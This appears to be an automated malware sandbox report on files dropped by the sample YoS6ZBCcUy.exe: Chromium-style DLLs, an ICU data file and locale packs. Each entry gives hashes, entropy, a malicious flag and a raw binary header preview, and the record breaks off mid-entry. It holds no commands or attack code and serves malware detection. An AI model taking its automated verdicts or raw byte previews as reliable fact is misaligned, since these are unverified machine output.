                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d.....Ne.........." ......8..........<).......................................K......JK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\ffmpeg.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2929152
                                                                                                                                                                                            Entropy (8bit):6.70454100720416
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:ZBAnytEwrZu/3Q8rvnh2UGH6qfhtvRIdefZiC6Cry2:ZBFE6kfbrvnh21K+io
                                                                                                                                                                                            MD5:5A168CB3EA9D0E7400BAABF60F6AB933
                                                                                                                                                                                            SHA1:82A86CB7F42294AB4AD6669C19B92605D960B676
                                                                                                                                                                                            SHA-256:AF5F1BC9F6A73750FA0C7BF17439700CFB3AB23E1393F0C9899825417E319B54
                                                                                                                                                                                            SHA-512:7C1441ECD049543E38297A7B6929E9F3EB978422D0CE508FBE6350FFEBD297F947B8D9EC75BD2054142DCD8461EEF1BF110E040D0830DA977FDE8944BECE843D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........." ......#...................................................:...........`A..........................................*.......*.(.............9..............:.<5....*.......................*.(.....$.@...........H.*.8............................text.....#.......#................. ..`.rdata........$.......#.............@..@.data.........+.."....+.............@....pdata.......9.......+.............@..@.gxfg....+...0:..,...J,.............@..@.retplne.....`:......v,..................tls.........p:......x,.............@..._RDATA........:......z,.............@..@.reloc..<5....:..6...|,.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\icudtl.dat

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10468208
                                                                                                                                                                                            Entropy (8bit):6.265606239082294
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:196608:+SPBhORiYAXHiXUxY/iJ53IWhlVjEeIu2Y6U:++wkpHiXUxY/iJ53IWhlVjEeIZU
                                                                                                                                                                                            MD5:FFD67C1E24CB35DC109A24024B1BA7EC
                                                                                                                                                                                            SHA1:99F545BC396878C7A53E98A79017D9531AF7C1F5
                                                                                                                                                                                            SHA-256:9AE98C06CBB0EA43C5CD6B5725310C008C65E46072421A1118CB88E1DE9A8B92
                                                                                                                                                                                            SHA-512:E1A865E685D2D3BACD0916D4238A79462519D887FEB273A251120BB6AF2B4481D025F3B21CE9A1A95A49371A0AA3ECF072175BA756974E831DBFDE1F0FEAEB79
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E...(...E...)...F...).."F...1..5F..`1..EF...N..XF..PN..hF...N..xF.......F.......F.......F..@....F.......F......F..0....F.......G......$G......7G......JG......]G..@...pG.......G.......G..@....G.......G.......G..@....G.......G..p....H..`....H.......H..@...AH......TH..p...gH.....zH.......H..`....H.......H.......H..P....H.......H......H..`....I......%I..P...:I......RI.....bI..@...uI.......I.......I.......I..P....I.......I.......I..0....I.......J... ...J.. !..-J..@$..=J...$..PJ...$..qJ.......J...<...J....&..J....&..J.. .&..J....&..K..`.&..K....&.3K....&.JK..0.&.aK....'.xK....'..K....'..K...(..K....(..K...O)..K....)..L..0Q*.>L..`.*.gL..Pi+..L....+..L...i,..L....,..L..P}-..M..@.-.,M.. .-.EM....-.\M....-.uM....-..M...$...M..0%...M....0..M...j0..M..`.0..N..p.0.1N....0.AN....0.TN..@.0.iN....0..N..0.0..N....0..N....0..N....1..N....1..N..

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libEGL.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):493056
                                                                                                                                                                                            Entropy (8bit):6.3672588781107775
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:0PfRujpqWG9btH+M1wLPfj9iDcHetGsHUN0dxI2H6sNkD4Fvh2W:eAWt+MWLPfjkVGbN0dxI2H63D4Bh2
                                                                                                                                                                                            MD5:39CCF402A62F068A8C573B45EA96154D
                                                                                                                                                                                            SHA1:57CEB915EA6F88C7FCCA35339BF951659C0338AB
                                                                                                                                                                                            SHA-256:8649D77ACE8E5753B9A10E7AE3349AAFA9D8E3406BA9C8C36A59633A84B3C41B
                                                                                                                                                                                            SHA-512:C4F9225C54D413176CB3DD2B26D429493FD056C7C283BC7A1C52B4A2059DBB11380DAF5D847BE1FF29F058BA0EF44D4BF66A3D9E9A600000DC8F6D20DFB2ED03
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........." .....l................................................................`A.........................................l......h{..(.......x....P..l?..............<....d.......................c..(.......@...........p~...............................text....k.......l.................. ..`.rdata..lr.......t...p..............@..@.data....K....... ..................@....pdata..l?...P...@..................@..@.gxfg... &.......(...D..............@..@.retplne.............l...................tls....!............n..............@..._RDATA...............p..............@..@.rsrc...x............r..............@..@.reloc..<............x..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libGLESv2.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8418304
                                                                                                                                                                                            Entropy (8bit):6.508090684401189
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:Q7XpFwEPVsR+1HYJnahAB4tVsX43wYMg:QXVrAtsw
                                                                                                                                                                                            MD5:F055A130C79BD517BDB53B1F8A38BD3B
                                                                                                                                                                                            SHA1:9FBA0AD4BA973BB285B23CC125004BAF61A98B5A
                                                                                                                                                                                            SHA-256:45B53759392B81CE7D916B3F1CF02BE30289809BD31D09FC1524EF2609183B17
                                                                                                                                                                                            SHA-512:D9DCB217F268862C577CACF4E9F84C63E02B647113D484338A74EB0B24FADD6D87B4E7A551DD1EF692BB38E44562BFF848982ACB62840D4F49F91A7751320E34
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........." ......d...........N......................................`............`A........................................m.w.......x.d....p........}..H....................w.......................w.(.....d.@.............x.......w.@....................text.....d.......d................. ..`.rdata..D.....d.......d.............@..@.data.........y.......y.............@....pdata...H....}..J....}.............@..@.gxfg....-...........d..............@..@.retplne.....@...........................tls....B....P......................@..._RDATA.......`......................@..@.rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\af.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):533447
                                                                                                                                                                                            Entropy (8bit):5.412080848029905
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:WEGL+ocurcdy6VGycsaja+H2Jyngae5Ig1eo0vMIlgL2pQ+FXZG2vt2pslFd5/51:W1+ozrc86VZBaja+H2Jyngae5Ig1eo0N
                                                                                                                                                                                            MD5:D9BEC09B6C523DC3BCA9A81264B1BEED
                                                                                                                                                                                            SHA1:EA4AE9DFF554C59994632F85AF25B36C049FB5B2
                                                                                                                                                                                            SHA-256:0B5A45DE223CE8522CC296AF1E93477540EAA74867428307CC3A5CD21921B022
                                                                                                                                                                                            SHA-512:6E7677F86F73EDFFB5D6162CA19BB7464465F0F485CE2971FB20AD3F57D9FAC56B7A21D378701F80E85FB185C3AF6A238F8C8707F5874BFFFFD79D881A54DD6E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.....k.)...l.4...n.<...o.A...p.N...q.T...r.`...s.....t.....v.....w.....y.....z.\...|.....}.........................................................................#.....2.....C.....V...........A.......................c.........................................M.......................F.......................!.....o.......................c.................$.....y.................0.......................,.......................7 ..... ..... ..... ....h!.....!....."....1"....."....."....."....."....E#.....#.....#.....#.....$....@$...._$....h$.....$.....%....L%....[%.....%.....&....B&....R&.....&.....&.....'.....'....n'.....'.....'.....'....7(.....(.....(.....(....1).....).....).....)....Q*.....*.....*.....*....1+....s+.....+.....+.....,....U,....z,.....,.....-....]-.....-.....-....*.....h.......................I/....u/...../...../....A0....|0.....0....#1.....1.....1.....2....}2.....2.....3....=3.....3.....4....54....H4.....4.....4.....4.....5....e5.....5.....5

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\am.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):861015
                                                                                                                                                                                            Entropy (8bit):4.906916579483596
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:HzD984ToH3hTCNRysrxQH9hjN3Rpzvh51muMXqVFq+XG/6WxLP5A:qn5N
                                                                                                                                                                                            MD5:E3933DE22DC7FB98215B083D8A379F40
                                                                                                                                                                                            SHA1:68DDBD9BCC931F0D4A172FA65AF35B823C7C9E37
                                                                                                                                                                                            SHA-256:EAA747075E5A62BE8B7DF5908E167CCC5314C9C6A8B890059D00284A3C496FEF
                                                                                                                                                                                            SHA-512:7BEB80FA029F41CB21536B15C604E2AE9DFC20B4A3EC4F5CC04E2B105D4B2C251830624957197084761F9686F95D332E25D4F6178509AD58257AF90D96A9E7D5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.%...j.1...k.@...l.K...n.S...o.X...p.e...q.k...r.w...s.....t.....v.....w.....y.E...z.s...|.....}.................................................&.....'.....(.....-.....I....._.......................`...................................6.................S...........E...........P.................x.................S ..... .....!.....!.....!....P".....".....".....#....^$.....$.....$.....%.....&....c&.....&.....'.....'.....(....A(.....(....{).....).....).....*.....+.....,....H,.....,.....-....C-....v-.....-....N................../....w/...../...../....u0.....1....y1.....1....@2.....2....03....F3.....3....c4.....4.....4...._5.....5....16....P6.....6....T7.....7.....7....`8.....9.....9.....9....0:.....:.....:.....;.....;.....;....6<....^<.....<....c=.....=.....=....{>.....>....b?.....?....*@.....@.....@.....@.....A.....B....RB....qB....,C.....C.....D....7D.....E.....E....TF....nF....9G.....G....NH.....H....LI.....I....`J.....J.....J....FK....lK.....K....8L.....L....6M

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ar.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):943328
                                                                                                                                                                                            Entropy (8bit):4.930661249056055
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:NYI8HRnwBUC/+/RYfESugvPUB6m7kOCSn5KNp5QpnSKU/:SNHRnh5aQM
                                                                                                                                                                                            MD5:AC865FF462F341B4317C3D16EEB40460
                                                                                                                                                                                            SHA1:1E971D97F09884B23595F17534227EA43CF99090
                                                                                                                                                                                            SHA-256:0557BC17EB1D134BD52F203836551B55579114708E2DF51F653972951567513D
                                                                                                                                                                                            SHA-512:A935B91A2C053303E941866CFC151F28053FAF364AEECE98D61FCD68FEF6C6F1D3B73DE01CD602C8A4A081CCE452D1CE87F8166BA3C0E8B81E91D932F84737F2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:........j(..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.&...t.=...v.r...w.....y.....z.....|.....}.K.....t.....y.......................................................................L.....@.....#....................... .....|...........H...........m...........?...........L.....}.............................k............ ....) ..... ....a!.....!.....!....."....\#.....#.....#.....$.....%.... &....Q&.....&.....'.....'.....(.....(....l).....).....).....+.....+.....,.....,....p-.....-..........Y...........B/....u/...../.....0.....0.....0.....0.....1....Z2.....2.....2....h3.....3....,4....=4.....4....w5.....5.....5....q6.....6....57....L7.....7....W8.....8.....8....F9.....9....H:....e:.....:....d;.....;.....;....K<.....<.....<.....=....L>.....>.....>....U?.....?.....@....a@.....@....9A....\A....yA.....B.....B.....B.....C.....C.....C....KD....dD....lE....MF.....G.....G.....G....mH.....H.....H.....I.....J....EJ....\J.....J....%K....KK...._K.....L.....L....&M....HM.....M

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\bg.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):982837
                                                                                                                                                                                            Entropy (8bit):4.669923863173967
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:MhQgWoOYLYyzQkECvUPVbKDks373ZAW3AAK1mVDLpv74umpjd2SI5IxuFsoGQXxQ:VgWoOYLYfYUPVbKDks373ZN3ApmVDLpw
                                                                                                                                                                                            MD5:7C37C8C9B4215089B6C16D22838D256B
                                                                                                                                                                                            SHA1:8F2AFDC21353685353A0562452F4A79180E58829
                                                                                                                                                                                            SHA-256:2EBD582DFAA3139CD6A03E9892A94A3D9BB6936E0B04085B8F2D27E1DEC0BC8A
                                                                                                                                                                                            SHA-512:BEADD70E9D706576BFB6725617385F776E9F68C84D116B01187354D377E2C860899DA34F8C5A054C4BDE41A57E9AAC56445F6AC0B8DA8C75A424641A86FDD718
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i."...j.....k.=...l.H...n.P...o.U...p.b...q.h...r.t...s.....t.....v.....w.....y.B...z.p...|.....}.................................................#.....$.....%.....*.....L.....e.............................$.....U.................9.....c...........p...........Z.....P.......................r ..... ....F!....l!.....".....".....".....#.....#.....$.....%....b%....^&.... '.....'.....'.....(.....)...."*....X*.... +.....+....5,...._,....K-......................./.....0....N1.....1....C2.....2.....3....)3.....3....\4.....4.....4....z5.....6....J6....p6....'7.....7.....8....E8.....8....n9.....9.....9....l:.....:....0;....P;.....;....a<.....<.....<....n=.....=....J>....r>....m?....S@.....@....-A.....A....^B.....B.....B...._C.....C.....D....gD....CE.....E....^F.....F.....G....3H.....H.....I.....I....NJ.....J.....J.....K....(L.....L.....L.....M....8N.....N.....N.....O.....P....XQ.....Q....}R....7S.....S.....S.....T....dU.....U.....U.....V.... W....kW.....W.....X....dY.....Y

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\bn.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1267393
                                                                                                                                                                                            Entropy (8bit):4.284356072775859
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:LEcoGqGB2le1abaCb6Ew/0WySZIS+xd2f/MHDrYfHBpxspSPrCXqB+iBbHRI8T51:LjJfa56/0z5XpCOXqB+iBbD5YqNn
                                                                                                                                                                                            MD5:FC66ADF3DEAC72FD39105540DD2DAEFF
                                                                                                                                                                                            SHA1:A53B54EFCC1285A226D605116F87D12F69942482
                                                                                                                                                                                            SHA-256:EF50CFEBAF9E32EDEEC25D30197AC5899B3DB8A0676671F639D32BC48F3B3BD8
                                                                                                                                                                                            SHA-512:0B77DAA056451D01A8CFB3FF1ACC08D34E64E0A32BB119C8837AE3D6E3D5195311427C6101EFD7E7BC9104AA369832BB12AAB3D4080C00DC39EDC98B6C0B949E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.....k.....l.#...n.+...o.1...p.>...q.D...r.P...s.....t.....v.....w.....y.....z.L...|.s...}...............................................................................0.....U.....................................................?.......................Z.................. ..... ....(!.....!.....".....#....N#.....$.....$.....%....+%....R&....0'.....'.....(.....).....)....^*.....*.....+....~,.....-....1-.....-.........../....E/....@0....*1.....1.....1.....3.....4.....4.....5.....5....k6.....6.....6.....7.....8....`8.....8.....9.....9.....9.....:.....:.....;.....;....:<.....<.....=.....=.... >.....>....{?.....?.....?.....@....9A.....A.....A....XB.....B....LC....rC.....D.....E....{F.....F.....G.....H.....I....QI.....I....sJ.....J.....J.....K....iL.....L.....M.....M.....N....^O.....O.....P....#Q....oQ.....Q.....R....5S.....S.....S.....T....{U....#V....\V.....W.....X.....Y.....Z....@[....B\.....\....L].....^.....^....W_....._....]`....$a.....a.....a.....b.....c

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ca.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):598934
                                                                                                                                                                                            Entropy (8bit):5.408962543645936
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:gVHfWsqPdf9nwWF47D1MeCi24b3Fe5PFFuN3Mw2juwHzejm0t3l3kb7TenzL8wOs:gV/WRdlnPyToiL6YhgMNxgCh5cxSas
                                                                                                                                                                                            MD5:E1AC7F4C28177F68FAC3BE2375A9368C
                                                                                                                                                                                            SHA1:3D7738699087468A748F9B1189D2F7621187D03B
                                                                                                                                                                                            SHA-256:EFA1BA906F8ABCE91EBB9D6442B64E0D5AE7DAB78DDA8A49A6FED1A342C71B9B
                                                                                                                                                                                            SHA-512:AEE8CB28EB02E2FB2155C8D093CF678284E3571F46B913F743DE3C6D0215C18B80866FF446F46ADA160860ED9C18AE9A4209424E7E0F0BA97C78A3FE9815CA5A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.....k.!...l.,...n.4...o.9...p.F...q.L...r.X...s.....t.....v.....w.....y.&...z.T...|.{...}.........................................................................%.....>.....^.....|.......................7.................S.....l.............................m.......................v.......................k...................................2.....`...........R.................- ..... ..... ..... ....I!.....!.....!.....!....c".....".....#....,#.....#....L$.....$.....$....3%.....%.....%.....%.....&....i&.....&.....&.....&....N'....{'.....'.....'....\(.....(.....(.....)....b).....).....).....)....H*....s*.....*.....*.....+....I+....V+.....+.....,....A,....R,.....,....D-.....-.....-..........\................../....L/....o/...../.....0....S0....h0.....0....N1.....1.....1....+2....r2.....2.....2.....3....^3.....3.....3.....4....c4.....4.....4....b5.....5....\6....w6.....6....c7.....7.....7....I8.....8.....8.....8....@9.....9.....9.....9....9:.....:.....:.....:

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\cs.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):616994
                                                                                                                                                                                            Entropy (8bit):5.843791316218894
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:863oqX0hmR4QkWA9jN85ASh6mARAO52C+wH/NOKbJSBXR8QQ:VYPNB85AS0P52C+wH/NOeJS+
                                                                                                                                                                                            MD5:92E3FD1EB47767A0CB5F6E734DE4EEC1
                                                                                                                                                                                            SHA1:33053BFEAD1FA67160B6A3C417EC4559BFDCDCFB
                                                                                                                                                                                            SHA-256:D269E16FBD9B2AFE95B148ECE22B2AC803768FB53EE42E1FAD0181F9DEC84544
                                                                                                                                                                                            SHA-512:916D73D9B28B0600878418A06388C2ED61BFAF17807A16E1C157A30E5DA136C6B6F194E99D151C43B9AA35D101DE755CAA6DA69E1C8A50DD134F27A7F2ADC016
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.....k.....l.....n.....o.....p.&...q.,...r.8...s.g...t.~...v.....w.....y.....z.4...|.[...}...........................................................................................4...........^.................<.......................i...........A.....Z...........?.....{.................U.......................D.....l.................T.................:.................+............ ....K ....c ..... ....6!....k!....{!.....!....k"....."....."....:#.....#.....#.....$....u$.....$.....$.....$....N%.....%.....%.....%..../&.....&.....&.....&.....'.....'.....'.....'....2(.....(.....(.....(....-).....).....).....)...."*.....*.....*.....*....:+.....+.....+.....+....f,.....,....)-....@-.....-.....-.....-..........Q.......................W/...../...../...../....]0.....0.....1....I1.....1.....1.....2.....2.....2.....3....13....F3.....3.... 4....a4....y4.....4....g5.....5.....5....E6.....6.....7....77.....7.....8....D8....Y8.....8.....9....49....H9.....9....":....\:

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\da.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):558889
                                                                                                                                                                                            Entropy (8bit):5.449151445338137
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:Gqv1aOSLABh3359zVmh5OsfZh1seDrwwlQJWJwgIobwmPaHL95bpkUdRi3jd4xFm:GqonsMfPrWb55bpfddm
                                                                                                                                                                                            MD5:43029018648D558F9BBF7A74C59EB281
                                                                                                                                                                                            SHA1:90C6618CCCB4DB85D7485AE8D809EC3AF4763E70
                                                                                                                                                                                            SHA-256:4BD88F6AB82842358987AAD384775B35198DD75C2CCE4CAE783208ED69296A7E
                                                                                                                                                                                            SHA-512:9E8EF9D4367AD01F2F4E7DD6F9884E463729EE5A0F678FD16A3CE093C21EFC1D78041D5C6E45037F37BFD732E4833744485B00ACFDA2313A1D1E947993129A3D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.+...j.7...k.F...l.Q...n.Y...o.^...p.k...q.q...r.}...s.....t.....v.....w.$...y.K...z.y...|.....}...........................................%.....,.....-...........0.....>.....N.....b.....{...........`.................!.......................l...........A.....]...........-.....].....q........... .....G.....T.................2.....@.................8.....R...........>.....z.................w.................. ..... ..... ..... ....l!.....!....@"....Z"....."....s#.....#.....#....A$.....$.....$.....$....(%.....%.....%.....%.....&....Z&....~&.....&.....&....R'.....'.....'.....'....W(.....(.....(.....(....K)....v).....).....)....**....P*....Z*.....*.....+....@+....N+.....+....I,.....,.....,.....-...._-.....-.....-.....-....<.....Z.....r............/....6/....F/...../.....0....h0.....0.....0....W1....|1.....1.....1....b2.....2.....2.....3....T3.....3.....3.....4.....4.....4.....4....q5.....5.....6....N6.....6.....7....J7....\7.....7.....7.....8.....8.....8.....8.....9

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\de.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):596603
                                                                                                                                                                                            Entropy (8bit):5.5059525736264
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:55U5D5aDs3K7UpGg5aL9Xtt5fPMkUz1CTz:5eaDs3K7UpGg5aLRf53MtCTz
                                                                                                                                                                                            MD5:3A8DE004B3A610271E1D1913B6D4B53B
                                                                                                                                                                                            SHA1:236893C3F7B450E6AD8B4D54E1A62B2E635B42D6
                                                                                                                                                                                            SHA-256:43C060182C92CAF4AEBF8FD7B913DFE017BEEA71E796E862EBF8746575948364
                                                                                                                                                                                            SHA-512:B70F849CCF7DD9E72D71522591420E0BAA03FF74763B44563B0B3800BA3A88CB8B973FABB90BBB6653819947ECA47F70E347958E3C31AB226957F7313BC03554
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:........((C.e.....h.....i.'...j.3...k.B...l.M...n.U...o.Z...p.g...q.m...r.y...s.....t.....v.....w. ...y.G...z.u...|.....}...........................................!.....(.....).....*.....,.....=.....P.....b.....x.....2...........J....._...........b.................?...................................?.....W...........B.....p.................k.................:.............................'.....c............ ..... ..... ..... ....O!.....!....."....#"....."....O#.....#.....#....]$.....$....Q%....p%.....%....O&....q&.....&.....&....^'.....'.....'.....(....p(.....(.....(....1).....).....).....*.....*.....+....7+....G+.....+.....,....a,....r,.....,....W-.....-.....-............................j/.....0....W0....m0.....0....J1....l1.....1.....1....62....S2....f2.....2....93....b3....u3.....4.....4.....4.....4...._5.....5.....5.....5....q6.....6.....7.... 7.....7.....8....X8....n8.....8....|9.....9.....9....i:.....:....);....V;.....;....?<....l<.....<.....<....U=....~=.....=.....>.....>.....>

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\el.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1076241
                                                                                                                                                                                            Entropy (8bit):4.759988949622547
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:yvHcaFbu4FDYX9QCMDhWJXDsS7miHk3D2NpYRDojvmXgVT8y2IWYNQKlCt2rDQur:aHcaFbu4FDYX9QCMDhWJXDsS7miHcD2r
                                                                                                                                                                                            MD5:58D6EAF71B9B73F5F7F057C73D0D92EC
                                                                                                                                                                                            SHA1:16E0587753E7D2834F4CBB24FED45E7BD2F8F2F4
                                                                                                                                                                                            SHA-256:8474879DE21C414D34C44CF0A8C91356A66DBD647308A4F994BE25BD1F93A89F
                                                                                                                                                                                            SHA-512:AB24C9655BD68E4A64E257914A35DC84B5F791C58B396AE004BF5DA61DF19C02EF9CA572B8E63F15BAF3694AE1E540ADF74586F10D28D7EF90EDEEC982BCF28D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.....k.....l.(...n.0...o.5...p.B...q.H...r.T...s.....t.....v.....w.....y."...z.P...|.w...}...............................................................................S...........................................................T.....\.....0.................1...........F ..... ....C!.....!....)"....J"....."....~#.....#.....#.....$.....%.....%.....&.....'.....(.....(.....(.....)....t*.....*.....+.....+.....,....'-....R-....C............/...../.....0.....1.....2.....2....~3..../4....{4.....4....R5.....6....H6....m6.....7.....7.....8....<8.....9.....9....]:.....:....Q;.....<.....<.....<....y=....O>.....>.....>.....?....Y@.....@.....@.....A....QB.....B.....B.....C.....D....wE.....E....|F....DG.....G.....G....}H.....I....<I....XI.....J.....J.....K....0K.....L.....L....YM.....M....VN.....O....<O....cO.....P.....P....NQ.....Q....kR.....S.....S.....S.....T.....V.....V.....W.....X.....X....dY.....Y.....Z.....[....7\....h\....#].....]....W^....y^....._....z`.....`

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\en-GB.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):485863
                                                                                                                                                                                            Entropy (8bit):5.521699894815275
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:Ll+Npdwk8sj7ahcbKdFk+ufMP9ezQSKrfaYdrcLlY5IPxZBcvRJ+G:Ll++143fMuQSK3Z5MxLG
                                                                                                                                                                                            MD5:985558DE03BF486AEC1DAADD39CB508D
                                                                                                                                                                                            SHA1:B693DDEF983E8AF212936202DDCA92D908378404
                                                                                                                                                                                            SHA-256:1956D448A4D333638F3601D0DA976710CBE0A795504EB694BA18311FE586D195
